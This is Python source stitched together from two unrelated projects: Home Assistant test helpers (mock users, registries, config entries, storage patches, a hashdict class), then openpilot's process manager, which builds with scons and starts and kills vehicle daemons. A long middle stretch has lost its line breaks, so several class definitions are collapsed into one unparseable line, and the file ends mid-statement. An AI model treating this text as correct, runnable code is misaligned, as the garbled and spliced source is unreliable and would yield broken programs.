    """Fire the MQTT message."""
    if isinstance(payload, str):
        payload = payload.encode("utf-8")
    msg = Message(topic, payload, qos, retain)
    hass.data["mqtt"]._mqtt_handle_message(msg)


fire_mqtt_message = threadsafe_callback_factory(async_fire_mqtt_message)


@ha.callback
def async_fire_time_changed(hass, datetime_, fire_all=False):
    """Fire a time changed event."""
    hass.bus.async_fire(EVENT_TIME_CHANGED,
                        {"now": date_util.as_utc(datetime_)})

    for task in list(hass.loop._scheduled):
        if not isinstance(task, asyncio.TimerHandle):
            continue
        if task.cancelled():
            continue

        mock_seconds_into_future = datetime_.timestamp() - time.time()
        future_seconds = task.when() - hass.loop.time()

        if fire_all or mock_seconds_into_future >= future_seconds:
            with patch(
                "homeassistant.helpers.event.pattern_utc_now",
                return_value=date_util.as_utc(datetime_),
            ):
                task._run()
                task.cancel()


fire_time_changed = threadsafe_callback_factory(async_fire_time_changed)


def fire_service_discovered(hass, service, info):
    """Fire a service discovered event."""
    hass.bus.fire(
        EVENT_PLATFORM_DISCOVERED,
        {ATTR_SERVICE: service, ATTR_DISCOVERED: info},
    )


@ha.callback
def async_fire_service_discovered(hass, service, info):
    """Fire a service discovered event."""
    hass.bus.async_fire(
        EVENT_PLATFORM_DISCOVERED,
        {ATTR_SERVICE: service, ATTR_DISCOVERED: info},
    )


def load_fixture(filename):
    """Load a fixture."""
    path = os.path.join(os.path.dirname(__file__), "fixtures", filename)
    with open(path, encoding="utf-8") as fptr:
        return fptr.read()


def mock_state_change_event(hass, new_state, old_state=None):
    """Mock state change event."""
    event_data = {"entity_id": new_state.entity_id, "new_state": new_state}

    if old_state:
        event_data["old_state"] = old_state

    hass.bus.fire(EVENT_STATE_CHANGED, event_data, context=new_state.context)


@ha.callback
def mock_component(hass, component):
    """Mock a component is setup."""
    if component in hass.config.components:
        raise AssertionError(f"Integration {component} is already setup")

    hass.config.components.add(component)


def mock_registry(hass, mock_entries=None):
    """Mock the Entity Registry."""
    registry = entity_registry.EntityRegistry(hass)
    registry.entities = mock_entries or OrderedDict()
    registry._rebuild_index()

    hass.data[entity_registry.DATA_REGISTRY] = registry
    return registry


def mock_area_registry(hass, mock_entries=None):
    """Mock the Area Registry."""
    registry = area_registry.AreaRegistry(hass)
    registry.areas = mock_entries or OrderedDict()

    hass.data[area_registry.DATA_REGISTRY] = registry
    return registry


def mock_device_registry(hass, mock_entries=None, mock_deleted_entries=None):
    """Mock the Device Registry."""
    registry = device_registry.DeviceRegistry(hass)
    registry.devices = mock_entries or OrderedDict()
    registry.deleted_devices = mock_deleted_entries or OrderedDict()
    registry._rebuild_index()

    hass.data[device_registry.DATA_REGISTRY] = registry
    return registry


class MockGroup(auth_models.Group):
    """Mock a group in Home Assistant."""

    def __init__(self, id=None, name="Mock Group",
                 policy=system_policies.ADMIN_POLICY):
        """Mock a group."""
        kwargs = {"name": name, "policy": policy}
        if id is not None:
            kwargs["id"] = id

        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add entry to the auth manager."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._groups[self.id] = self
        return self


class MockUser(auth_models.User):
    """Mock a user in Home Assistant."""

    def __init__(
        self,
        id=None,
        is_owner=False,
        is_active=True,
        name="Mock User",
        system_generated=False,
        groups=None,
    ):
        """Initialize mock user."""
        kwargs = {
            "is_owner": is_owner,
            "is_active": is_active,
            "name": name,
            "system_generated": system_generated,
            "groups": groups or [],
            "perm_lookup": None,
        }
        if id is not None:
            kwargs["id"] = id
        super().__init__(**kwargs)

    def add_to_hass(self, hass):
        """Test helper to add entry to hass."""
        return self.add_to_auth_manager(hass.auth)

    def add_to_auth_manager(self, auth_mgr):
        """Test helper to add entry to the auth manager."""
        ensure_auth_manager_loaded(auth_mgr)
        auth_mgr._store._users[self.id] = self
        return self

    def mock_policy(self, policy):
        """Mock a policy for a user."""
        self._permissions = auth_permissions.PolicyPermissions(
            policy, self.perm_lookup)


async def register_auth_provider(hass, config):
    """Register an auth provider."""
    provider = await auth_providers.auth_provider_from_config(
        hass, hass.auth._store, config
    )
    assert provider is not None, "Invalid config specified"
    key = (provider.type, provider.id)
    providers = hass.auth._providers

    if key in providers:
        raise ValueError("Provider already registered")

    providers[key] = provider
    return provider


@ha.callback
def ensure_auth_manager_loaded(auth_mgr):
    """Ensure an auth manager is considered loaded."""
    store = auth_mgr._store
    if store._users is None:
        store._set_defaults()
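# Usage sketch (illustrative): the mock auth models above plug into a test
# hass instance created with the factories earlier in this file.
#
# >>> owner = MockUser(is_owner=True)
# >>> owner.add_to_hass(hass)          # registers via the auth store
# >>> owner.is_owner
# True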
async_setup_entry if async_unload_entry is not None: self.async_unload_entry = async_unload_entry if async_migrate_entry is not None: self.async_migrate_entry = async_migrate_entry if async_remove_entry is not None: self.async_remove_entry = async_remove_entry def mock_manifest(self): """Generate a mock manifest to represent this module.""" return { **loader.manifest_from_legacy_module(self.DOMAIN, self), **(self._partial_manifest or {}), } class MockPlatform: """Provide a fake platform.""" __name__ = "homeassistant.components.light.bla" __file__ = "homeassistant/components/blah/light" # pylint: disable=invalid-name def __init__( self, setup_platform=None, dependencies=None, platform_schema=None, async_setup_platform=None, async_setup_entry=None, scan_interval=None, ): """Initialize the platform.""" self.DEPENDENCIES = dependencies or [] if platform_schema is not None: self.PLATFORM_SCHEMA = platform_schema if scan_interval is not None: self.SCAN_INTERVAL = scan_interval if setup_platform is not None: # We run this in executor, wrap it in function self.setup_platform = lambda *args: setup_platform(*args) if async_setup_platform is not None: self.async_setup_platform = async_setup_platform if async_setup_entry is not None: self.async_setup_entry = async_setup_entry if setup_platform is None and async_setup_platform is None: self.async_setup_platform = AsyncMock(return_value=None) class MockEntityPlatform(entity_platform.EntityPlatform): """Mock class with some mock defaults.""" def __init__( self, hass, logger=None, domain="test_domain", platform_name="test_platform", platform=None, scan_interval=timedelta(seconds=15), entity_namespace=None, ): """Initialize a mock entity platform.""" if logger is None: logger = logging.getLogger("homeassistant.helpers.entity_platform") # Otherwise the constructor will blow up. 
if isinstance(platform, Mock) and isinstance(platform.PARALLEL_UPDATES, Mock): platform.PARALLEL_UPDATES = 0 super().__init__( hass=hass, logger=logger, domain=domain, platform_name=platform_name, platform=platform, scan_interval=scan_interval, entity_namespace=entity_namespace, ) class MockToggleEntity(entity.ToggleEntity): """Provide a mock toggle device.""" def __init__(self, name, state, unique_id=None): """Initialize the mock entity.""" self._name = name or DEVICE_DEFAULT_NAME self._state = state self.calls = [] @property def name(self): """Return the name of the entity if any.""" self.calls.append(("name", {})) return self._name @property def state(self): """Return the state of the entity if any.""" self.calls.append(("state", {})) return self._state @property def is_on(self): """Return true if entity is on.""" self.calls.append(("is_on", {})) return self._state == STATE_ON def turn_on(self, **kwargs): """Turn the entity on.""" self.calls.append(("turn_on", kwargs)) self._state = STATE_ON def turn_off(self, **kwargs): """Turn the entity off.""" self.calls.append(("turn_off", kwargs)) self._state = STATE_OFF def last_call(self, method=None): """Return the last call.""" if not self.calls: return None if method is None: return self.calls[-1] try: return next(call for call in reversed(self.calls) if call[0] == method) except StopIteration: return None class MockConfigEntry(config_entries.ConfigEntry): """Helper for creating config entries that adds some defaults.""" def __init__( self, *, domain="test", data=None, version=1, entry_id=None, source=config_entries.SOURCE_USER, title="Mock Title", state=None, options={}, system_options={}, connection_class=config_entries.CONN_CLASS_UNKNOWN, unique_id=None, ): """Initialize a mock config entry.""" kwargs = { "entry_id": entry_id or uuid.uuid4().hex, "domain": domain, "data": data or {}, "system_options": system_options, "options": options, "version": version, "title": title, "connection_class": connection_class, "unique_id": unique_id, } if source is not None: kwargs["source"] = source if state is not None: kwargs["state"] = state super().__init__(**kwargs) def add_to_hass(self, hass): """Test helper to add entry to hass.""" hass.config_entries._entries.append(self) def add_to_manager(self, manager): """Test helper to add entry to entry manager.""" manager._entries.append(self) def patch_yaml_files(files_dict, endswith=True): """Patch load_yaml with a dictionary of yaml files.""" # match using endswith, start search with longest string matchlist = sorted(list(files_dict.keys()), key=len) if endswith else [] def mock_open_f(fname, **_): """Mock open() in the yaml module, used by load_yaml.""" # Return the mocked file on full match if fname in files_dict: _LOGGER.debug("patch_yaml_files match %s", fname) res = StringIO(files_dict[fname]) setattr(res, "name", fname) return res # Match using endswith for ends in matchlist: if fname.endswith(ends): _LOGGER.debug("patch_yaml_files end match %s: %s", ends, fname) res = StringIO(files_dict[ends]) setattr(res, "name", fname) return res # Fallback for hass.components (i.e. 
services.yaml) if "homeassistant/components" in fname: _LOGGER.debug("patch_yaml_files using real file: %s", fname) return open(fname, encoding="utf-8") # Not found raise FileNotFoundError(f"File not found: {fname}") return patch.object(yaml_loader, "open", mock_open_f, create=True) def mock_coro(return_value=None, exception=None): """Return a coro that returns a value or raise an exception.""" fut = asyncio.Future() if exception is not None: fut.set_exception(exception) else: fut.set_result(return_value) return fut @contextmanager def assert_setup_component(count, domain=None): """Collect valid configuration from setup_component. - count: The amount of valid platforms that should be setup - domain: The domain to count is optional. It can be automatically determined most of the time Use as a context manager around setup.setup_component with assert_setup_component(0) as result_config: setup_component(hass, domain, start_config) # using result_config is optional """ config = {} async def mock_psc(hass, config_input, integration): """Mock the prepare_setup_component to capture config.""" domain_input = integration.domain res = await async_process_component_config(hass, config_input, integration) config[domain_input] = None if res is None else res.get(domain_input) _LOGGER.debug( "Configuration for %s, Validated: %s, Original %s", domain_input, config[domain_input], config_input.get(domain_input), ) return res assert isinstance(config, dict) with patch("homeassistant.config.async_process_component_config", mock_psc): yield config if domain is None: assert len(config) == 1, "assert_setup_component requires DOMAIN: {}".format( list(config.keys()) ) domain = list(config.keys())[0] res = config.get(domain) res_len = 0 if res is None else len(res) assert ( res_len == count ), f"setup_component failed, expected {count} got {res_len}: {res}" def init_recorder_component(hass, add_config=None): """Initialize the recorder.""" config = dict(add_config) if add_config else {} config[recorder.CONF_DB_URL] = "sqlite://" # In memory DB with patch("homeassistant.components.recorder.migration.migrate_schema"): assert setup_component(hass, recorder.DOMAIN, {recorder.DOMAIN: config}) assert recorder.DOMAIN in hass.config.components _LOGGER.info("In-memory recorder successfully started") def mock_restore_cache(hass, states): """Mock the DATA_RESTORE_CACHE.""" key = restore_state.DATA_RESTORE_STATE_TASK data = restore_state.RestoreStateData(hass) now = date_util.utcnow() last_states = {} for state in states: restored_state = state.as_dict() restored_state["attributes"] = json.loads( json.dumps(restored_state["attributes"], cls=JSONEncoder) ) last_states[state.entity_id] = restore_state.StoredState( State.from_dict(restored_state), now ) data.last_states = last_states _LOGGER.debug("Restore cache: %s", data.last_states) assert len(data.last_states) == len(states), f"Duplicate entity_id? 
{states}" hass.data[key] = data class MockEntity(entity.Entity): """Mock Entity class.""" def __init__(self, **values): """Initialize an entity.""" self._values = values if "entity_id" in values: self.entity_id = values["entity_id"] @property def name(self): """Return the name of the entity.""" return self._handle("name") @property def should_poll(self): """Return the ste of the polling.""" return self._handle("should_poll") @property def unique_id(self): """Return the unique ID of the entity.""" return self._handle("unique_id") @property def state(self): """Return the state of the entity.""" return self._handle("state") @property def available(self): """Return True if entity is available.""" return self._handle("available") @property def device_info(self): """Info how it links to a device.""" return self._handle("device_info") @property def device_class(self): """Info how device should be classified.""" return self._handle("device_class") @property def unit_of_measurement(self): """Info on the units the entity state is in.""" return self._handle("unit_of_measurement") @property def capability_attributes(self): """Info about capabilities.""" return self._handle("capability_attributes") @property def supported_features(self): """Info about supported features.""" return self._handle("supported_features") @property def entity_registry_enabled_default(self): """Return if the entity should be enabled when first added to the entity registry.""" return self._handle("entity_registry_enabled_default") def _handle(self, attr): """Return attribute value.""" if attr in self._values: return self._values[attr] return getattr(super(), attr) @contextmanager def mock_storage(data=None): """Mock storage. Data is a dict {'key': {'version': version, 'data': data}} Written data will be converted to JSON to ensure JSON parsing works. 
""" if data is None: data = {} orig_load = storage.Store._async_load async def mock_async_load(store): """Mock version of load.""" if store._data is None: # No data to load if store.key not in data: return None mock_data = data.get(store.key) if "data" not in mock_data or "version" not in mock_data: _LOGGER.error('Mock data needs "version" and "data"') raise ValueError('Mock data needs "version" and "data"') store._data = mock_data # Route through original load so that we trigger migration loaded = await orig_load(store) _LOGGER.info("Loading data for %s: %s", store.key, loaded) return loaded def mock_write_data(store, path, data_to_write): """Mock version of write data.""" _LOGGER.info("Writing data to %s: %s", store.key, data_to_write) # To ensure that the data can be serialized data[store.key] = json.loads(json.dumps(data_to_write, cls=store._encoder)) async def mock_remove(store): """Remove data.""" data.pop(store.key, None) with patch( "homeassistant.helpers.storage.Store._async_load", side_effect=mock_async_load, autospec=True, ), patch( "homeassistant.helpers.storage.Store._write_data", side_effect=mock_write_data, autospec=True, ), patch( "homeassistant.helpers.storage.Store.async_remove", side_effect=mock_remove, autospec=True, ): yield data async def flush_store(store): """Make sure all delayed writes of a store are written.""" if store._data is None: return store._async_cleanup_final_write_listener() store._async_cleanup_delay_listener() await store._async_handle_write_data() async def get_system_health_info(hass, domain): """Get system health info.""" return await hass.data["system_health"]["info"][domain](hass) def mock_integration(hass, module): """Mock an integration.""" integration = loader.Integration( hass, f"homeassistant.components.{module.DOMAIN}", None, module.mock_manifest() ) _LOGGER.info("Adding mock integration: %s", module.DOMAIN) hass.data.setdefault(loader.DATA_INTEGRATIONS, {})[module.DOMAIN] = integration hass.data.setdefault(loader.DATA_COMPONENTS, {})[module.DOMAIN] = module return integration def mock_entity_platform(hass, platform_path, module): """Mock a entity platform. platform_path is in form light.hue. Will create platform hue.light. """ domain, platform_name = platform_path.split(".") mock_platform(hass, f"{platform_name}.{domain}", module) def mock_platform(hass, platform_path, module=None): """Mock a platform. platform_path is in form hue.config_flow. """ domain, platform_name = platform_path.split(".") integration_cache = hass.data.setdefault(loader.DATA_INTEGRATIONS, {}) module_cache = hass.data.setdefault(loader.DATA_COMPONENTS, {}) if domain not in integration_cache: mock_integration(hass, MockModule(domain)) _LOGGER.info("Adding mock integration platform: %s", platform_path) module_cache[platform_path] = module or Mock() def async_capture_events(hass, event_name): """Create a helper that captures events.""" events = [] @ha.callback def capture_events(event): events.append(event) hass.bus.async_listen(event_name, capture_events) return events @ha.callback def async_mock_signal(hass, signal): """Catch all dispatches to a signal.""" calls = [] @ha.callback def mock_signal_handler(*args): """Mock service call.""" calls.append(args) hass.helpers.dispatcher.async_dispatcher_connect(signal, mock_signal_handler) return calls class hashdict(dict): """ hashable dict implementation, suitable for use as a key into other dicts. 
    >>> h1 = hashdict({"apples": 1, "bananas": 2})
    >>> h2 = hashdict({"bananas": 3, "mangoes": 5})
    >>> h1 + h2
    hashdict(apples=1, bananas=3, mangoes=5)
    >>> d1 = {}
    >>> d1[h1] = "salad"
    >>> d1[h1]
    'salad'
    >>> d1[h2]
    Traceback (most recent call last):
    ...
    KeyError: hashdict(bananas=3, mangoes=5)

    based on answers from
    http://stackoverflow.com/questions/1151658/python-hashable-dicts

    """

    def __key(self):
        return tuple(sorted(self.items()))

    def __repr__(self):  # noqa: D105 no docstring
        # wrap the sorted items in the class name so repr() matches the
        # doctest above, e.g. hashdict(apples=1, bananas=2)
        return "{}({})".format(
            self.__class__.__name__,
            ", ".join(f"{i[0]!s}={i[1]!r}" for i in self.__key()),
        )

    def __hash__(self):  # noqa: D105 no docstring
        return hash(self.__key())

    def __setitem__(self, key, value):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def __delitem__(self, key):  # noqa: D105 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def clear(self):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def pop(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def popitem(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def setdefault(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    def update(self, *args, **kwargs):  # noqa: D102 no docstring
        raise TypeError(f"{self.__class__.__name__} does not support item assignment")

    # update is not ok because it mutates the object
    # __add__ is ok because it creates a new object
    # while the new object is under construction, it's ok to mutate it
    def __add__(self, right):  # noqa: D105 no docstring
        result = hashdict(self)
        dict.update(result, right)
        return result


def assert_lists_same(a, b):
    """Compare two lists, ignoring order."""
    assert collections.Counter([hashdict(i) for i in a]) == collections.Counter(
        [hashdict(i) for i in b]
    )
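
# --- Illustrative usage sketch, not used by the helpers above. Shows the
# order-insensitive list comparison and the hashdict merge semantics from
# the doctest; assumes only the definitions in this module.
if __name__ == "__main__":
    # same dicts in a different order compare equal
    assert_lists_same([{"x": 1}, {"y": 2}], [{"y": 2}, {"x": 1}])

    h1 = hashdict({"apples": 1, "bananas": 2})
    h2 = hashdict({"bananas": 3, "mangoes": 5})
    # __add__ builds a new hashdict; right-hand values win on key collisions
    assert h1 + h2 == {"apples": 1, "bananas": 3, "mangoes": 5}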
manager.py
#!/usr/bin/env python3 import os import time import sys import fcntl import errno import signal import shutil import subprocess import datetime import textwrap from typing import Dict, List from selfdrive.swaglog import cloudlog, add_logentries_handler from common.basedir import BASEDIR from common.hardware import HARDWARE, ANDROID, PC WEBCAM = os.getenv("WEBCAM") is not None sys.path.append(os.path.join(BASEDIR, "pyextra")) os.environ['BASEDIR'] = BASEDIR TOTAL_SCONS_NODES = 1040 prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt')) # Create folders needed for msgq try: os.mkdir("/dev/shm") except FileExistsError: pass except PermissionError: print("WARNING: failed to make /dev/shm") if ANDROID: os.chmod("/dev/shm", 0o777) def unblock_stdout(): # get a non-blocking stdout child_pid, child_pty = os.forkpty() if child_pid != 0: # parent # child is in its own process group, manually pass kill signals signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT)) signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM)) fcntl.fcntl(sys.stdout, fcntl.F_SETFL, fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK) while True: try: dat = os.read(child_pty, 4096) except OSError as e: if e.errno == errno.EIO: break continue if not dat: break try: sys.stdout.write(dat.decode('utf8')) except (OSError, IOError, UnicodeDecodeError): pass # os.wait() returns a tuple with the pid and a 16 bit value # whose low byte is the signal number and whose high byte is the exit satus exit_status = os.wait()[1] >> 8 os._exit(exit_status) if __name__ == "__main__": unblock_stdout() from common.spinner import Spinner from common.text_window import TextWindow import importlib import traceback from multiprocessing import Process # Run scons spinner = Spinner() spinner.update("0") if not prebuilt: for retry in [True, False]: # run scons env = os.environ.copy() env['SCONS_PROGRESS'] = "1" env['SCONS_CACHE'] = "1" nproc = os.cpu_count() j_flag = "" if nproc is None else "-j8" scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE) compile_output = [] # Read progress from stderr and update spinner while scons.poll() is None: try: line = scons.stderr.readline() # type: ignore if line is None: continue line = line.rstrip() prefix = b'progress: ' if line.startswith(prefix): i = int(line[len(prefix):]) if spinner is not None: spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES))) elif len(line): compile_output.append(line) print(line.decode('utf8', 'replace')) except Exception: pass if scons.returncode != 0: # Read remaining output r = scons.stderr.read().split(b'\n') # type: ignore compile_output += r if retry: if not os.getenv("CI"): print("scons build failed, cleaning in") for i in range(3, -1, -1): print("....%d" % i) time.sleep(1) # subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env) # shutil.rmtree("/tmp/scons_cache") else: print("scons build failed after retry") sys.exit(1) else: # Build failed log errors errors = [line.decode('utf8', 'replace') for line in compile_output if any([err in line for err in [b'error: ', b'not found, needed by target']])] error_s = "\n".join(errors) add_logentries_handler(cloudlog) cloudlog.error("scons build failed\n" + error_s) # Show TextWindow error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors]) with TextWindow("openpilot failed to build\n \n" + error_s) as t: t.wait_for_exit() exit(1) else: break import cereal import cereal.messaging as messaging from 
common.params import Params import selfdrive.crash as crash from selfdrive.registration import register from selfdrive.version import version, dirty from selfdrive.loggerd.config import ROOT from selfdrive.launcher import launcher from common.apk import update_apks, pm_apply_packages, start_offroad ThermalStatus = cereal.log.ThermalData.ThermalStatus # comment out anything you don't want to run managed_processes = { "thermald": "selfdrive.thermald.thermald", "uploader": "selfdrive.loggerd.uploader", "deleter": "selfdrive.loggerd.deleter", "controlsd": "selfdrive.controls.controlsd", "plannerd": "selfdrive.controls.plannerd", "radard": "selfdrive.controls.radard", "dmonitoringd": "selfdrive.monitoring.dmonitoringd", "ubloxd": ("selfdrive/locationd", ["./ubloxd"]), "loggerd": ("selfdrive/loggerd", ["./loggerd"]), "logmessaged": "selfdrive.logmessaged", "locationd": "selfdrive.locationd.locationd", "tombstoned": "selfdrive.tombstoned", "logcatd": ("selfdrive/logcatd", ["./logcatd"]), "proclogd": ("selfdrive/proclogd", ["./proclogd"]), "boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly "pandad": "selfdrive.pandad", "ui": ("selfdrive/ui", ["./ui"]), "calibrationd": "selfdrive.locationd.calibrationd", "paramsd": "selfdrive.locationd.paramsd", "camerad": ("selfdrive/camerad", ["./camerad"]), "sensord": ("selfdrive/sensord", ["./sensord"]), "clocksd": ("selfdrive/clocksd", ["./clocksd"]), "gpsd": ("selfdrive/sensord", ["./gpsd"]), "updated": "selfdrive.updated", "dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]), "modeld": ("selfdrive/modeld", ["./modeld"]), "rtshield": "selfdrive.rtshield", } daemon_processes = { "manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"), } running: Dict[str, Process] = {} def get_running(): return running # due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption unkillable_processes = ['camerad'] # processes to end with SIGINT instead of SIGTERM interrupt_processes: List[str] = [] # processes to end with SIGKILL instead of SIGTERM kill_processes = ['sensord'] persistent_processes = [ 'thermald', 'logmessaged', 'ui', 'uploader', 'deleter', ] if not PC: persistent_processes += [ 'updated', 'logcatd', 'tombstoned', 'sensord', ] car_started_processes = [ 'controlsd', 'plannerd', 'loggerd', 'radard', 'calibrationd', 'paramsd', 'camerad', 'proclogd', 'locationd', 'clocksd', ] driver_view_processes = [ 'camerad', 'dmonitoringd', 'dmonitoringmodeld' ] if WEBCAM: car_started_processes += [ 'dmonitoringd', 'dmonitoringmodeld', ] if not PC: car_started_processes += [ 'ubloxd', 'dmonitoringd', 'dmonitoringmodeld', ] if ANDROID: car_started_processes += [ 'gpsd', 'rtshield', ] # starting dmonitoringmodeld when modeld is initializing can sometimes \ # result in a weird snpe state where dmon constantly uses more cpu than normal. 
car_started_processes += ['modeld'] def register_managed_process(name, desc, car_started=False): global managed_processes, car_started_processes, persistent_processes print("registering %s" % name) managed_processes[name] = desc if car_started: car_started_processes.append(name) else: persistent_processes.append(name) # ****************** process management functions ****************** def nativelauncher(pargs, cwd): # exec the process os.chdir(cwd) # because when extracted from pex zips permissions get lost -_- os.chmod(pargs[0], 0o700) os.execvp(pargs[0], pargs) def start_managed_process(name): if name in running or name not in managed_processes: return proc = managed_processes[name] if isinstance(proc, str): cloudlog.info("starting python %s" % proc) running[name] = Process(name=name, target=launcher, args=(proc,)) else: pdir, pargs = proc cwd = os.path.join(BASEDIR, pdir) cloudlog.info("starting process %s" % name) running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd)) running[name].start() def start_daemon_process(name): params = Params() proc, pid_param = daemon_processes[name] pid = params.get(pid_param, encoding='utf-8') if pid is not None: try: os.kill(int(pid), 0) with open(f'/proc/{pid}/cmdline') as f: if proc in f.read(): # daemon is running return except (OSError, FileNotFoundError): # process is dead pass cloudlog.info("starting daemon %s" % name) proc = subprocess.Popen(['python', '-m', proc], # pylint: disable=subprocess-popen-preexec-fn stdin=open('/dev/null', 'r'), stdout=open('/dev/null', 'w'), stderr=open('/dev/null', 'w'), preexec_fn=os.setpgrp) params.put(pid_param, str(proc.pid)) def prepare_managed_process(p): proc = managed_processes[p] if isinstance(proc, str): # import this python cloudlog.info("preimporting %s" % proc) importlib.import_module(proc) elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")): # build this process cloudlog.info("building %s" % (proc,)) try: subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) except subprocess.CalledProcessError: # make clean if the build failed cloudlog.warning("building %s failed, make clean" % (proc, )) subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0])) subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0])) def join_process(process, timeout): # Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382 # We have to poll the exitcode instead t = time.time() while time.time() - t < timeout and process.exitcode is None: time.sleep(0.001) def kill_managed_process(name): if name not in running or name not in managed_processes: return cloudlog.info("killing %s" % name) if running[name].exitcode is None: if name in interrupt_processes: os.kill(running[name].pid, signal.SIGINT) elif name in kill_processes: os.kill(running[name].pid, signal.SIGKILL) else: running[name].terminate() join_process(running[name], 5) if running[name].exitcode is None: if name in unkillable_processes: cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name) join_process(running[name], 15) if running[name].exitcode is None: cloudlog.critical("unkillable process %s failed to die!" 
% name) # TODO: Use method from HARDWARE if ANDROID: cloudlog.critical("FORCE REBOOTING PHONE!") os.system("date >> /sdcard/unkillable_reboot") os.system("reboot") raise RuntimeError else: cloudlog.info("killing %s with SIGKILL" % name) os.kill(running[name].pid, signal.SIGKILL) running[name].join() cloudlog.info("%s is dead with %d" % (name, running[name].exitcode)) del running[name] def cleanup_all_processes(signal, frame): cloudlog.info("caught ctrl-c %s %s" % (signal, frame)) if ANDROID: pm_apply_packages('disable') for name in list(running.keys()): kill_managed_process(name) cloudlog.info("everything is dead") def send_managed_process_signal(name, sig): if name not in running or name not in managed_processes or \ running[name].exitcode is not None: return cloudlog.info(f"sending signal {sig} to {name}") os.kill(running[name].pid, sig) # ****************** run loop ****************** def manager_init(should_register=True): if should_register: reg_res = register() if reg_res: dongle_id = reg_res else: raise Exception("server registration failed") else: dongle_id = "c"*16 # set dongle id cloudlog.info("dongle id is " + dongle_id) os.environ['DONGLE_ID'] = dongle_id cloudlog.info("dirty is %d" % dirty) if not dirty: os.environ['CLEAN'] = '1' cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True) crash.bind_user(id=dongle_id) crash.bind_extra(version=version, dirty=dirty, is_eon=True) os.umask(0) try: os.mkdir(ROOT, 0o777) except OSError: pass # ensure shared libraries are readable by apks if ANDROID: os.chmod(BASEDIR, 0o755) os.chmod(os.path.join(BASEDIR, "cereal"), 0o755) os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755) def manager_thread(): # now loop thermal_sock = messaging.sub_sock('thermal') cloudlog.info("manager start") cloudlog.info({"environ": os.environ}) # save boot log subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd")) params = Params() # start daemon processes for p in daemon_processes: start_daemon_process(p) # start persistent processes for p in persistent_processes: start_managed_process(p) # start offroad if ANDROID: pm_apply_packages('enable') start_offroad() if os.getenv("NOBOARD") is None: start_managed_process("pandad") if os.getenv("BLOCK") is not None: for k in os.getenv("BLOCK").split(","): del managed_processes[k] started_prev = False logger_dead = False while 1: msg = messaging.recv_sock(thermal_sock, wait=True) if msg.thermal.freeSpace < 0.05: logger_dead = True if msg.thermal.started: for p in car_started_processes: if p == "loggerd" and logger_dead: kill_managed_process(p) else: start_managed_process(p) else: logger_dead = False driver_view = params.get("IsDriverViewEnabled") == b"1" # TODO: refactor how manager manages processes for p in reversed(car_started_processes): if p not in driver_view_processes or not driver_view: kill_managed_process(p) for p in driver_view_processes: if driver_view: start_managed_process(p) else: kill_managed_process(p) # trigger an update after going offroad if started_prev: send_managed_process_signal("updated", signal.SIGHUP) started_prev = msg.thermal.started # check the status of all processes, did any of them die? 
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running] cloudlog.debug(' '.join(running_list)) # Exit main loop when uninstall is needed if params.get("DoUninstall", encoding='utf8') == "1": break def manager_prepare(spinner=None): # build all processes os.chdir(os.path.dirname(os.path.abspath(__file__))) # Spinner has to start from 70 here total = 100.0 if prebuilt else 30.0 for i, p in enumerate(managed_processes): if spinner is not None: spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),)) prepare_managed_process(p) def uninstall(): cloudlog.warning("uninstalling") with open('/cache/recovery/command', 'w') as f: f.write('--wipe_data\n') # IPowerManager.reboot(confirm=false, reason="recovery", wait=true) HARDWARE.reboot(reason="recovery") def main(): if ANDROID: # the flippening! os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1') # disable bluetooth os.system('service call bluetooth_manager 8') params = Params() params.manager_start() default_params = [ ("CommunityFeaturesToggle", "0"), ("CompletedTrainingVersion", "0"), ("IsRHD", "0"), ("IsMetric", "0"), ("RecordFront", "0"), ("HasAcceptedTerms", "0"), ("HasCompletedSetup", "0"), ("IsUploadRawEnabled", "1"), ("IsLdwEnabled", "1"), ("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')), ("OpenpilotEnabledToggle", "1"), ("LaneChangeEnabled", "1"), ("IsDriverViewEnabled", "0"), ] # set unset params for k, v in default_params: if params.get(k) is None: params.put(k, v) # is this chffrplus? if os.getenv("PASSIVE") is not None: params.put("Passive", str(int(os.getenv("PASSIVE")))) if 